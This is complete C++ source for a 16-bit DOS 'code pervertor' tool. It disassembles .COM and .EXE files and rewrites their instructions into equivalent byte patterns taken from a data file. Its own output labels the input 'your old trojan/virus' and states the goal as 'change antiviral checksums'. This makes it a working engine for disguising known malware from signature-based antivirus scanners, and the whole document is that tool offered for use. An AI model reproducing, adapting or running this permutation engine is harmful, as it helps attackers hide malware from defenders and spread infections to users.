
#include <windows.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <io.h>

#pragma hdrstop

extern "C" int __cdecl disasm_main(BYTE*);

#define M_OPCODE        1
#define M_CODE          2
#define M_OK            4
#define M_NEXT          8

int OPT_RND=1;
int OPT_DUMP=0;

#include "mz.hpp"

DWORD randseed = GetTickCount();

inline DWORD my_rnd(DWORD x)
{
  return (((randseed = randseed * 214013 + 2531011) >> 16) * x) >> 16;
}

DWORD cnt;
char  *arr1[1024];
char  *arr2[1024];

void load_data(const char* filename)
{
  cnt=0;
  char a1[256],a2[256];
  a1[0]=a2[0]=0;

  printf(" loading %s\n", filename);

  FILE*f=fopen(filename,"rb");
  if (f==NULL)
  {
    printf("***ERROR***: error loading data file\n", filename);
    exit(0);
  }
  int m1=0, m2=0, line=0;
  while (!feof(f))
  {
    char c=fgetc(f);
    if (c==';') m1=1;
    if ((c==0x0D)||(c==0x0A)) { m1=0; line++; };
    if (!m1)
    {
      if (c=='-') m2=1;
      if (c=='+') m2=2;
      if (((c>='0')&&(c<='9'))||
          ((c>='a')&&(c<='z'))||
          ((c>='A')&&(c<='Z')))
      {
        if (m2==1) *(WORD*)&a1[strlen(a1)]=c;
        if (m2==2) *(WORD*)&a2[strlen(a2)]=c;
      }
      if (c=='$')
      {
        m2=0;
        arr1[cnt]=strdup(a1);
        arr2[cnt]=strdup(a2);
        cnt++;

        if ( (strlen(a1)!=strlen(a2)) || ((strlen(a1)&7)!=0) )
        {
          printf("***ERROR***: %s(%i): error\n",filename,line);
          exit(0);
        }

        a1[0]=0;
        a2[0]=0;
      }
    } // if (!m1)
  }
  fclose(f);

  if (cnt==0)
  {
    printf("***ERROR***: no data\n");
    exit(0);
  }

  printf("  %i bitmasks loaded\n",cnt);

  if (OPT_DUMP)
  for (DWORD i=0; i<cnt; i++)
    printf("- %s --> %s\n", arr1[i], arr2[i]);

}

int pervert_opcode(BYTE* x)
{
  if (OPT_RND)
  if (my_rnd(2)) return 0;

  int var[26];
  int index[1024], count=0;

  for (DWORD i=0; i<cnt; i++)
  {

    memset(var, 0xFF, sizeof(var));
    for (DWORD j=0; j<strlen(arr1[i]); j++)
    {
      int  b = ( x[j>>3] >> (7-(j&7)) ) & 1;
      char c = arr1[i][j] | 0x20;  // lowercase
      if (c=='0') { if (b!=0) goto c1; } else
      if (c=='1') { if (b!=1) goto c1; } else
      if (var[c-'a']!=b)
      {
        if (var[c-'a']==-1)
          var[c-'a']=b;
        else
          goto c1;
      }
    }

    index[count++] = i;
c1:
  }

  if (count)
  {
    if (OPT_DUMP)
    printf("%02X %02X %02X ... v=%i\n", x[0],x[1],x[2], count);

    DWORD i = index[ my_rnd(count) ];

    memset(var, 0xFF, sizeof(var));
    for (DWORD j=0; j<strlen(arr1[i]); j++)
    {
      int  b = ( x[j>>3] >> (7-(j&7)) ) & 1;
      char c = arr1[i][j] | 0x20;  // lowercase
      if (c=='0') { if (b!=0) __emit__(0xcc); } else
      if (c=='1') { if (b!=1) __emit__(0xcc); } else
      if (var[c-'a']!=b)
      {
        if (var[c-'a']==-1)
          var[c-'a']=b;
        else
          __emit__(0xcc);
      }
    }

    for (DWORD j=0; j<strlen(arr2[i]); j++)
    {
      char c = arr2[i][j] | 0x20;
      int b;
      if (c=='0') b=0; else
      if (c=='1') b=1; else
      {
        b=var[c-'a'];
        if (b==-1)
        {
          printf("***ERROR***: error in data file ('%c' variable)\n", c);
          exit(0);
        }
        if (c!=arr2[i][j]) b=b^1;  // upcase? - invert
      }
      if ((j&7)==0) x[j>>3]=0;
      x[j>>3] |= b << (7-(j&7));
    }

    return strlen(arr2[i])/8;
  }

  return 0;
}

void pervert_buf(BYTE* buf, DWORD bufsize)
{
  BYTE* map = new BYTE[ bufsize ];

  MZ_HEADER* mz = (MZ_HEADER*) &buf[0];

  DWORD entry;

  if ( (mz->mz_id == 'MZ') ||
       (mz->mz_id == 'ZM') )
  {
    printf("  - EXE-file detected\n");
    entry = mz->mz_headersize * 16 + ((short)mz->mz_cs)*16 + mz->mz_ip;
    printf("  - entry at 0x%08X\n", entry);
  }
  else
  {
    printf("  - COM-file detected\n");
    entry = 0;
  }

  printf("  - disassembling\n");

  memset(map, 0, bufsize);
  map[ entry ] = M_NEXT;

  DWORD ip;

  for(;;)
  {

    DWORD t = (DWORD)memchr(map, M_NEXT, bufsize);
    if (!t) break;
    ip = t - (DWORD)map;

    map[ ip ] |= M_OK;

    for(;;)
    {
      BYTE b = buf[ip];
      WORD w = *(WORD*)&buf[ip];

      if ( (w==0x0000)||
           (w==0xFFFF) ) break;

      if ((b==0xB8)&&(buf[ip+2]==0x4C)&&
          (buf[ip+3]==0xCD)&&(buf[ip+4]==0x21)) break;
      if ((b==0xB4)&&(buf[ip+1]==0x4C)&&
          (buf[ip+2]==0xCD)&&(buf[ip+3]==0x21)) break;
      if (w==0x20CD) break;

      int len = disasm_main(&buf[ip]);
      if (len==-1) break;

      map[ip] |= M_OPCODE;
      for(int i=0; i<len; i++)
        map[ip] |= M_CODE | M_OK;

      if (OPT_DUMP)
      {
        printf("%04X ", ip);
        for (int i=0; i<len; i++)
          printf(" %02X", buf[ip+i]);
        printf("\n");
      }

      DWORD rel = 0xFFFFFFFF;
      if (((b&0xF0)==0x70)||((b&0xFC)==0xE0)||(b==0xEB))
        rel = ip + 2 + *(char *)&buf[ip+1];
      if ((w&0xF0FF)==0x800F)
        rel = ip + 4 + *(short*)&buf[ip+2];
      if ((b==0xE8)||(b==0xE9))
        rel = ip + 3 + *(short*)&buf[ip+1];
      if (rel < bufsize)
        map[ rel ] |= M_NEXT;

      if (   ((b&0xF6)==0xC2)||(b==0xCF)||((w&0x38FF)==0x20FF) ||
             (b==0xEB)||(b==0xE9) )
        break;

      ip = ip + len;

      if (ip >= bufsize) break;
      if (map[ ip ] & M_OK) break;

    }//for
  }//for

  printf("  - processing\n");

  int count1=0, count2=0;

  for (DWORD i=0; i<bufsize; i++)
    if (map[i] & M_OPCODE)
    {
      int res = pervert_opcode(&buf[ i ]);
      if (res)
      {
        count1++;
        count2+=res;
      }
    }
  printf("    %i opcodes, %i bytes\n", count1, count2);

  delete map;
}

void pervert_file(char* ifile, char* ofile, char* xckfile)
{
  printf(" reading %s\n", ifile);

  FILE*f=fopen(ifile,"rb");
  assert(f);
  DWORD bufsize = filelength(fileno(f));
  BYTE* buf  = new BYTE[ 1024+bufsize ];
  assert(buf);
  fread(buf, 1,bufsize, f);
  fclose(f);

  BYTE* buf0 = new BYTE[ 1024+bufsize ];
  assert(buf0);
  memcpy(buf0, buf, bufsize);

  printf(" perverting\n");

  pervert_buf(buf, bufsize);

  if (*xckfile)
  {
    printf(" writing %s\n", xckfile);
    FILE*f=fopen(xckfile,"wb");
    assert(f);
    fprintf(f,"[BeginXCK]\x0D\x0A");
    fprintf(f," Description   : %s (your old trojan/virus)\x0D\x0A", ifile);
    fprintf(f," Crack subject : change antiviral checksums\x0D\x0A");
    fprintf(f," Comments      : http://z0mbie.cjb.net\x0D\x0A");
    fprintf(f," OS            : DOS\x0D\x0A");
    fprintf(f," Type of hack  : code permutation\x0D\x0A");
    fprintf(f," Source lang   : Borland C++\x0D\x0A");
    fprintf(f," Protection    : [] 01%\x0D\x0A");
    fprintf(f," Size          : %i\x0D\x0A", bufsize);
    fprintf(f," Crack made at : home ;-)\x0D\x0A");
    fprintf(f," Time for hack : 00:00:00\x0D\x0A");
    fprintf(f," Under Music   : Scorpions\x0D\x0A");
    fprintf(f,"[BeginCRK]\x0D\x0A");
    fprintf(f,"Description\x0D\x0A");
    fprintf(f,"\x0D\x0A");
    fprintf(f,"change some bytes...\x0D\x0A");
    fprintf(f,"%s\x0D\x0A", ifile);
    for (DWORD i=0; i<bufsize; i++)
      if (buf0[i]!=buf[i])
        fprintf(f,"%08X: %02X %02X\x0D\x0A", i, buf0[i], buf[i]);
    fprintf(f,"[EndCRK]\x0D\x0A");
    fprintf(f,"[EndXCK]\x0D\x0A");
    fclose(f);
  }

  printf(" writing %s\n", ofile);

  f=fopen(ofile,"wb");
  assert(f);
  fwrite(buf, 1,bufsize, f);
  fclose(f);

  delete buf;
}

void help()
{
  printf("syntax:\n"\
         "  PERVERT3 [-a] [-d] infile<.COM|.EXE> [outfile] [#xckfile] [@datafile]\n"\
         "\n"\
         "  -a        pervert all possible opcodes (otherwise randomly)\n"\
         "  -d        debug dump\n");
  exit(0);
}

void main(int argc, char* argv[])
{
  printf("CODE PERVERTOR/16-bit  v3.00  (x) 2000-2001  right toolz for the right job\n\n");

  char *ifile="", *ofile="", *datafile="", *xckfile="";

  for (int i=1; i<argc; i++)
  {
    if (!stricmp(argv[i],"/a")) OPT_RND=0; else
    if (!stricmp(argv[i],"-a")) OPT_RND=0; else
    if (!stricmp(argv[i],"/d")) OPT_DUMP=1; else
    if (!stricmp(argv[i],"-d")) OPT_DUMP=1; else
    if (argv[i][0]=='#')
    {
      if (!*xckfile) xckfile=&argv[i][1]; else help();
    }
    else
    if (argv[i][0]=='@')
    {
      if (!*datafile) datafile=&argv[i][1]; else help();
    }
    else
    if (!*ifile) ifile=argv[i]; else
    if (!*ofile) ofile=argv[i]; else
      help();
  }
  if (!*ifile) help();
  if (!*ofile) ofile=ifile;
  if (!*datafile) datafile="PERVERT3.DAT";

  char dfile[260];
  strcpy(dfile, argv[0]);
  strcpy(strrchr(dfile,'\\')+1, datafile);
  load_data(dfile);

  pervert_file(ifile, ofile, xckfile);
}
